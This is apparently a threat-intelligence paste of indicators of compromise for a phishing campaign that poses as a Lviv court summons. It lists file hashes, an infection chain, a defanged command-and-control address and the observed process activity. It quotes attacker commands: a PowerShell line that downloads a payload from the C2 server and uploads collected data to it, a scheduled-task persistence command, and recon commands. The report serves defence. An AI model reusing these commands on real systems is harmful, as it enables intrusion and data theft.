Advertisement
VRad

#script_recon_081123

Nov 8th, 2023 (edited)
437
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.08 KB | None | 0 0
  1. #IOC #OptiData #VR #WSH #RAR #SFX #powershell #task
  2.  
  3. https://pastebin.com/rpFYCNPS
  4.  
  5. attack_vector
  6. --------------
  7. email attach .rar (sfx) > .lnk > ps > task > Libraries.vbs > connect > recon > exfil
  8.  
  9.  
  10. # # # # # # # #
  11. email_headers
  12. # # # # # # # #
  13. Date: Wed, 08 Nov 2023 11:48:25 +0200
  14. Subject: Розсилка процесуальних документів, справа № 623/6341/11, Судова повістка про виклик в суд.
  15. From: СПД 3.9 (Франківський районний суд м.Львова) <spd.1331.ics.gov@ukr.net>
  16.  
  17. # # # # # # # #
  18. files
  19. # # # # # # # #
  20. SHA-256 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
  21. File name Повiстка-623-6341-11.rar [ WinRAR Self Extracting archive ]
  22. File size 331.92 KB (339886 bytes)
  23.  
  24. SHA-256 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378
  25. File name Повiстка-623-6341-11.docx.lnk [ Windows shortcut ]
  26. File size 19.86 KB (20332 bytes)
  27.  
  28. SHA-256 39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe
  29. File name Libraries.vbs [ WSH ]
  30. File size 747 B (747 bytes)
  31.  
  32. SHA-256 f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e
  33. File name 623-6341-11.docx [ Microsoft Word 2007+ ]
  34. File size 13.52 KB (13840 bytes)
  35.  
  36. # # # # # # # #
  37. activity
  38. # # # # # # # #
  39.  
  40. PL_SCR email_attach
  41.  
  42. C2 196.196. 156{ .2
  43.  
  44.  
  45. netwrk
  46. --------------
  47. 196.196. 156{ .2 196.196. 156{ .2:57881 57881 HTTP GET /HcKOAhaZgDePKGKF/page213/upgrade.txt HTTP/1.1
  48. 196.196. 156{ .2 196.196. 156{ .2:49210 49210 HTTP POST /page213 HTTP/1.1
  49.  
  50. comp
  51. --------------
  52. powershell.exe 916 196.196. 156{ .2 57881
  53. powershell.exe 916 196.196. 156{ .2 49210
  54.  
  55. proc
  56. --------------
  57.  
  58. powershell.exe ...
  59. WINWORD.EXE /n /dde
  60. schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 /tr C:\Users\Public\Libraries\Libraries.vbs /f
  61.  
  62. {another context}
  63.  
  64. WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
  65. powershell.exe net.webclient;$flm=$iik.
  66. downloaddata ('196.196.156{ .2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');
  67. uploaddata('196.196.156{ .2:49210/page213',$drpy);}
  68. ...
  69. whoami.exe
  70. systeminfo.exe
  71. ipconfig.exe
  72. net.exe" view
  73. ROUTE.EXE print -4 -6
  74. RP.EXE -a
  75. NETSTAT.EXE -ant
  76. TRACERT.EXE 8.8.8.8
  77.  
  78. persist
  79. --------------
  80. \ExplorerCoreUpdateTaskMachine C:\Users\Public\Libraries\Libraries.vbs [task]
  81.  
  82.  
  83. drop
  84. --------------
  85. %temp%\623-6341-11.docx
  86. C:\Users\Public\Libraries\Libraries.vbs
  87.  
  88.  
  89. # # # # # # # #
  90. additional info
  91. # # # # # # # #
  92.  
  93.  
  94. # # # # # # # #
  95. VT & Intezer
  96. # # # # # # # #
  97. https://www.virustotal.com/gui/file/86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a/details
  98. https://www.virustotal.com/gui/file/762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378/details
  99. https://www.virustotal.com/gui/file/39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe/details
  100. https://www.virustotal.com/gui/file/f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e/details
  101.  
  102. VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement